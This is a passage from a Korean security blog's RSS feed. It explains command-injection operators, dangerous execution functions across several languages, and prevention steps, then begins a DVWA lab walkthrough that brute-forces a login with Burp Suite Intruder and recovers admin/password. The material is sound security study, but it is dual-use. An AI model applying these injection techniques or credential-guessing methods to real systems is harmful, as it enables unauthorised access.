&lt;li&gt;`cmd1||cmd2`&lt;span&gt;&amp;nbsp;&lt;/span&gt;: (OR 논리연산) cmd1 실행이 실패할 경우에만 cmd2가 실행됩니다.&lt;/li&gt;
&lt;li&gt;`cmd1&amp;amp;&amp;amp;cmd2`&lt;span&gt;&amp;nbsp;&lt;/span&gt;: (AND 논리연산) cmd1 실행이 성공할 경우에만 cmd2가 실행됩니다.&lt;/li&gt;
&lt;li&gt;`$(cmd)`&lt;span&gt;&amp;nbsp;&lt;/span&gt;: (명령어 치환) cmd의 실행 결과를 캡처하여 다른 명령어의 일부로 사용합니다. 예를 들어 `echo $(whoami)`&lt;span&gt; 에서 `whoami` 명령어의 출력 결과를 포함하여 `사용자이름`을 출력합니다.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;`cmd`&lt;span&gt;&amp;nbsp;&lt;/span&gt;: 특정 명령어를 실행하는 데 사용됩니다.&lt;/li&gt;
&lt;li&gt;`&amp;gt;(cmd)`:&lt;span&gt; (프로세스 치환-출력) `&lt;/span&gt;&amp;gt;(ls)` 명령어의 출력을 임시 파일이나 스트림으로 만들어 다른 명령어로 보냅니다. 파일을 필요로 하는 명령어와 함께 사용됩니다.&lt;/li&gt;
&lt;li&gt;`&amp;lt;(cmd)`:&lt;span&gt; (프로세스 치환-입력) `&lt;/span&gt;&amp;lt;(ls)` 명령어의 출력을 임시 파일이나 스트림으로 만들어 다른 명령어가 입력으로 사용합니다.&lt;/li&gt;
&lt;/ul&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;PHP&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- `system`, `shell_exec`, `exec`, `proc_open`, `eval`&lt;/p&gt;&lt;br /&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;Shell Scripts&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- 모두 실행 가능&lt;/p&gt;&lt;br /&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;Perl&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- `open`, `sysopen`, `glob`, `system`, `eval` &lt;/p&gt;&lt;br /&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;Java&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- `Runtime.exec()`&lt;/p&gt;&lt;br /&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;C, C++&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- `system`, `exec`, `ShellExecute`&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;(strcpy strcat sprintf vsprintf gets strlen (특별히 null 바이트와 함께 사용될 경우) scanf() fscanf sscanf vscanf vsscanf vfscanf realpath getopt getpass streadd strecpy strtrns)&lt;/p&gt;&lt;br /&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;Python&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- `exec`, `eval`, `os.system`, `os.popen`, `subprocess.popen`, `subprocess.call`&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style3&quot; /&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;4. 예방방법&lt;/h3&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- 사용자 입력값 검증&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- 명령어 실행 회피&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;i&gt;&lt;span style=&quot;color: #009a87;&quot;&gt;&amp;nbsp; * 시스템 명령어 대신 안전한 API 사용 등&lt;/span&gt;&lt;/i&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- 입력값 이스케이프 처리&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- 최소 권한 사용&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;a href=&quot;https://owasp.org/Top10/A03_2021-Injection/&quot; target=&quot;_blank&quot; rel=&quot;noopener&amp;nbsp;noreferrer&quot;&gt;https://owasp.org/Top10/A03_2021-Injection/&lt;/a&gt;&lt;/p&gt;
&lt;figure id=&quot;og_1737035542517&quot; contenteditable=&quot;false&quot; data-ke-type=&quot;opengraph&quot; data-ke-align=&quot;alignCenter&quot; data-og-type=&quot;website&quot; data-og-title=&quot;A03 Injection - OWASP Top 10:2021&quot; data-og-description=&quot;A03:2021 &amp;ndash; Injection Factors CWEs Mapped Max Incidence Rate Avg Incidence Rate Avg Weighted Exploit Avg Weighted Impact Max Coverage Avg Coverage Total Occurrences Total CVEs 33 19.09% 3.37% 7.25 7.15 94.04% 47.90% 274,228 32,078 Overview Injection slide&quot; data-og-host=&quot;owasp.org&quot; data-og-source-url=&quot;https://owasp.org/Top10/A03_2021-Injection/&quot; data-og-url=&quot;https://owasp.org/Top10/A03_2021-Injection/&quot; data-og-image=&quot;https://scrap.kakaocdn.net/dn/cyP7FE/hyX0q04ENA/FhJeem4e6bHjTMTZbKypJK/img.png?width=592&amp;amp;height=592&amp;amp;face=0_0_592_592&quot;&gt;&lt;a href=&quot;https://owasp.org/Top10/A03_2021-Injection/&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot; data-source-url=&quot;https://owasp.org/Top10/A03_2021-Injection/&quot;&gt;
&lt;div class=&quot;og-image&quot; style=&quot;background-image: url('https://scrap.kakaocdn.net/dn/cyP7FE/hyX0q04ENA/FhJeem4e6bHjTMTZbKypJK/img.png?width=592&amp;amp;height=592&amp;amp;face=0_0_592_592');&quot;&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;og-text&quot;&gt;
&lt;p class=&quot;og-title&quot; data-ke-size=&quot;size16&quot;&gt;A03 Injection - OWASP Top 10:2021&lt;/p&gt;
&lt;p class=&quot;og-desc&quot; data-ke-size=&quot;size16&quot;&gt;A03:2021 &amp;ndash; Injection Factors CWEs Mapped Max Incidence Rate Avg Incidence Rate Avg Weighted Exploit Avg Weighted Impact Max Coverage Avg Coverage Total Occurrences Total CVEs 33 19.09% 3.37% 7.25 7.15 94.04% 47.90% 274,228 32,078 Overview Injection slide&lt;/p&gt;
&lt;p class=&quot;og-host&quot; data-ke-size=&quot;size16&quot;&gt;owasp.org&lt;/p&gt;
&lt;/div&gt;
&lt;/a&gt;&lt;/figure&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;a href=&quot;https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/12-Testing_for_Command_Injection&quot; target=&quot;_blank&quot; rel=&quot;noopener&amp;nbsp;noreferrer&quot;&gt;https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/12-Testing_for_Command_Injection&lt;/a&gt;&lt;/p&gt;
&lt;figure id=&quot;og_1737035553590&quot; contenteditable=&quot;false&quot; data-ke-type=&quot;opengraph&quot; data-ke-align=&quot;alignCenter&quot; data-og-type=&quot;website&quot; data-og-title=&quot;WSTG - Latest | OWASP Foundation&quot; data-og-description=&quot;WSTG - Latest on the main website for The OWASP Foundation. OWASP is a nonprofit foundation that works to improve the security of software.&quot; data-og-host=&quot;owasp.org&quot; data-og-source-url=&quot;https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/12-Testing_for_Command_Injection&quot; data-og-url=&quot;https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/12-Testing_for_Command_Injection&quot; data-og-image=&quot;https://scrap.kakaocdn.net/dn/rjfLm/hyX0o951ll/c1x7BzwB7OkKWneErAT6xK/img.png?width=64&amp;amp;height=64&amp;amp;face=0_0_64_64&quot;&gt;&lt;a href=&quot;https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/12-Testing_for_Command_Injection&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot; data-source-url=&quot;https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/12-Testing_for_Command_Injection&quot;&gt;
&lt;div class=&quot;og-image&quot; style=&quot;background-image: url('https://scrap.kakaocdn.net/dn/rjfLm/hyX0o951ll/c1x7BzwB7OkKWneErAT6xK/img.png?width=64&amp;amp;height=64&amp;amp;face=0_0_64_64');&quot;&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;og-text&quot;&gt;
&lt;p class=&quot;og-title&quot; data-ke-size=&quot;size16&quot;&gt;WSTG - Latest | OWASP Foundation&lt;/p&gt;
&lt;p class=&quot;og-desc&quot; data-ke-size=&quot;size16&quot;&gt;WSTG - Latest on the main website for The OWASP Foundation. OWASP is a nonprofit foundation that works to improve the security of software.&lt;/p&gt;
&lt;p class=&quot;og-host&quot; data-ke-size=&quot;size16&quot;&gt;owasp.org&lt;/p&gt;
&lt;/div&gt;
&lt;/a&gt;&lt;/figure&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;</description>
      <category>웹 보안/웹 해킹</category>
      <author>제나나</author>
      <guid isPermaLink="true">https://jennana.tistory.com/658</guid>
      <comments>https://jennana.tistory.com/658#entry658comment</comments>
      <pubDate>Thu, 16 Jan 2025 01:30:39 +0900</pubDate>
    </item>
    <item>
      <title>[DVWA 실습] Brute Force Attack</title>
      <link>https://jennana.tistory.com/657</link>
      <description>&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style5&quot; /&gt;
&lt;h2 style=&quot;text-align: center;&quot; data-ke-size=&quot;size26&quot;&gt;&lt;b&gt;[DVWA&amp;nbsp;실습]&amp;nbsp;Brute&amp;nbsp;Force&amp;nbsp;Attack&lt;/b&gt;&lt;/h2&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;  1. Low Level&lt;/h3&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;✔ 공격 대상 : &lt;b&gt;로그인 페이지&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;blob&quot; data-origin-width=&quot;743&quot; data-origin-height=&quot;522&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/NiwW1/btsLM01rlos/zJRuRA0Qkrkdk5uwlkEeH1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/NiwW1/btsLM01rlos/zJRuRA0Qkrkdk5uwlkEeH1/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/NiwW1/btsLM01rlos/zJRuRA0Qkrkdk5uwlkEeH1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FNiwW1%2FbtsLM01rlos%2FzJRuRA0Qkrkdk5uwlkEeH1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;743&quot; height=&quot;522&quot; data-filename=&quot;blob&quot; data-origin-width=&quot;743&quot; data-origin-height=&quot;522&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;  brute force 공격을 해야 하는 로그인 페이지. 무작위로 대입하여 Username이랑 Password를 얻어내면 된다.&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style3&quot; /&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;✔ 공격 도구 : `Burp Suite` 도구를 이용하여 무차별 공격&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;1. Burp Suite를 통해서 Proxy 설정을 한다.&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;blob&quot; data-origin-width=&quot;540&quot; data-origin-height=&quot;646&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/SagJs/btsLNLP9g0I/qYZNskKeGlLTinEHsulb8k/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/SagJs/btsLNLP9g0I/qYZNskKeGlLTinEHsulb8k/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/SagJs/btsLNLP9g0I/qYZNskKeGlLTinEHsulb8k/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FSagJs%2FbtsLNLP9g0I%2FqYZNskKeGlLTinEHsulb8k%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;400&quot; height=&quot;476&quot; data-filename=&quot;blob&quot; data-origin-width=&quot;540&quot; data-origin-height=&quot;646&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;2. Proxy 설정 후 `Intercept`를 하게 되면, HTTP Request 되는 패킷을 확인할 수 있다.&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;blob&quot; data-origin-width=&quot;758&quot; data-origin-height=&quot;499&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/b6ycDM/btsLOEJnIsy/Vofn6nKz72z08AEMxyBjOk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/b6ycDM/btsLOEJnIsy/Vofn6nKz72z08AEMxyBjOk/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/b6ycDM/btsLOEJnIsy/Vofn6nKz72z08AEMxyBjOk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fb6ycDM%2FbtsLOEJnIsy%2FVofn6nKz72z08AEMxyBjOk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;740&quot; height=&quot;487&quot; data-filename=&quot;blob&quot; data-origin-width=&quot;758&quot; data-origin-height=&quot;499&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;  GET 방식으로 `username`과 `password` 파라미터 값이 전달 된다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;3. Intruder 이용하기&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- Proxy에서 HTTP history에서 원하는 요청의 오른쪽 마우스 클릭 &amp;rarr; `Send to Intruder` 클릭&lt;/p&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;blob&quot; data-origin-width=&quot;759&quot; data-origin-height=&quot;509&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/TXKat/btsLOvFMKKZ/tK5QTbVuaw10wnqNbo9h11/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/TXKat/btsLOvFMKKZ/tK5QTbVuaw10wnqNbo9h11/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/TXKat/btsLOvFMKKZ/tK5QTbVuaw10wnqNbo9h11/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FTXKat%2FbtsLOvFMKKZ%2FtK5QTbVuaw10wnqNbo9h11%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;740&quot; height=&quot;496&quot; data-filename=&quot;blob&quot; data-origin-width=&quot;759&quot; data-origin-height=&quot;509&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;495&quot; data-origin-height=&quot;446&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/cmRfUg/btsLOsPPr0A/LZSWXMpQkOiPZKA5KOK3q0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/cmRfUg/btsLOsPPr0A/LZSWXMpQkOiPZKA5KOK3q0/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/cmRfUg/btsLOsPPr0A/LZSWXMpQkOiPZKA5KOK3q0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FcmRfUg%2FbtsLOsPPr0A%2FLZSWXMpQkOiPZKA5KOK3q0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;400&quot; height=&quot;360&quot; data-origin-width=&quot;495&quot; data-origin-height=&quot;446&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- `Intruder` &amp;rarr; `Positions`에서 무차별 공격에 필요한 인자만 선택하면 되고, 값이 변하는 곳에 `$`가 앞뒤로 들어가도록 설정한다.&lt;/p&gt;
&lt;p style=&quot;text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;  여기서는 `username`이랑 `password`의 값으로 들어갈 곳을 선택하면 된다.&lt;/p&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;blob&quot; data-origin-width=&quot;758&quot; data-origin-height=&quot;501&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/nFOls/btsLMFXw9nd/6ng0NYuk2BxFKGF1kUbhY1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/nFOls/btsLMFXw9nd/6ng0NYuk2BxFKGF1kUbhY1/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/nFOls/btsLMFXw9nd/6ng0NYuk2BxFKGF1kUbhY1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FnFOls%2FbtsLMFXw9nd%2F6ng0NYuk2BxFKGF1kUbhY1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;740&quot; height=&quot;489&quot; data-filename=&quot;blob&quot; data-origin-width=&quot;758&quot; data-origin-height=&quot;501&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;edited_blob&quot; data-origin-width=&quot;757&quot; data-origin-height=&quot;504&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/Nzpu5/btsLN0Gg8yn/PfJLsuggQ0E9DRKx9shiL1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/Nzpu5/btsLN0Gg8yn/PfJLsuggQ0E9DRKx9shiL1/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/Nzpu5/btsLN0Gg8yn/PfJLsuggQ0E9DRKx9shiL1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FNzpu5%2FbtsLN0Gg8yn%2FPfJLsuggQ0E9DRKx9shiL1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;740&quot; height=&quot;493&quot; data-filename=&quot;edited_blob&quot; data-origin-width=&quot;757&quot; data-origin-height=&quot;504&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;div&gt;&amp;nbsp;&lt;/div&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;4. `Payloads`에서 공격하는 방법 2가지&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;1) 모든 경우의 수를 대입하는 `Brute forcer` 이용하기 (Brute Force 공격)&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;  단점 : 모든 경우의 수를 대입하므로 시간이 많이 든다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;2) 미리 작성된 자주 사용하는 암호가 저장된 `Simple list` 이용하기 (Dictionary 공격)&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;  장점: 모든 경우의 수를 대입하는 것보다 빠르게 값을 찾을 수 있음.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;  단점: dictonary에 없는 경우 값을 찾을 수 없음.&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style3&quot; /&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;1) `Brute forcer`&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;blob&quot; data-origin-width=&quot;764&quot; data-origin-height=&quot;558&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/s7ZlW/btsLL7mCIbm/R0UKnCtZAULrsNTFn2c3oK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/s7ZlW/btsLL7mCIbm/R0UKnCtZAULrsNTFn2c3oK/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/s7ZlW/btsLL7mCIbm/R0UKnCtZAULrsNTFn2c3oK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fs7ZlW%2FbtsLL7mCIbm%2FR0UKnCtZAULrsNTFn2c3oK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;740&quot; height=&quot;540&quot; data-filename=&quot;blob&quot; data-origin-width=&quot;764&quot; data-origin-height=&quot;558&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;  `username`와 `password`에 대한 정보가 전혀 없기 때문에 `simple list`를 이용해 공격을 하였다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;2) `Simple list` 이용하기&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;`Payload Options [Simpe list]` 항목에&amp;nbsp;인터넷에 떠도는 dictionary 파일을 넣어서 dictionary list를 구성했다.&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;blob&quot; data-origin-width=&quot;753&quot; data-origin-height=&quot;503&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/HjgPg/btsLMHHW8FK/uB9epVvLc2jKhI3RSLkrdK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/HjgPg/btsLMHHW8FK/uB9epVvLc2jKhI3RSLkrdK/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/HjgPg/btsLMHHW8FK/uB9epVvLc2jKhI3RSLkrdK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FHjgPg%2FbtsLMHHW8FK%2FuB9epVvLc2jKhI3RSLkrdK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;740&quot; height=&quot;494&quot; data-filename=&quot;blob&quot; data-origin-width=&quot;753&quot; data-origin-height=&quot;503&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;i&gt;&lt;span style=&quot;color: #009a87;&quot;&gt;* (참고) payload set을 2개로 설정하면, username이랑 password 각각에 대해 dictionary를 이용할 수 있음&lt;/span&gt;&lt;/i&gt;&lt;/p&gt;
&lt;p style=&quot;text-align: center;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;text-align: center;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;background-color: #006dd7; color: #ffffff;&quot;&gt;&lt;b&gt;✈ 공격 시작 'start attack'&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;blob&quot; data-origin-width=&quot;751&quot; data-origin-height=&quot;421&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bFR30p/btsLM34POsf/3Hnm7GscCSg659gbrke0Gk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bFR30p/btsLM34POsf/3Hnm7GscCSg659gbrke0Gk/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bFR30p/btsLM34POsf/3Hnm7GscCSg659gbrke0Gk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbFR30p%2FbtsLM34POsf%2F3Hnm7GscCSg659gbrke0Gk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;740&quot; height=&quot;415&quot; data-filename=&quot;blob&quot; data-origin-width=&quot;751&quot; data-origin-height=&quot;421&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;공격 중에 username이 &lt;b&gt;admin&lt;/b&gt;이고, password가 &lt;b&gt;password&lt;/b&gt;일 때만 Length의 길이가 다른 걸 확인할 수 있다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;  로그인 성공했을 때 5524 bytes이고, 실패했을 때 5465 bytes인 걸로 추정이 가능하다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div style=&quot;background-color: #ffffff; color: #333333; text-align: left;&quot;&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;div&gt;
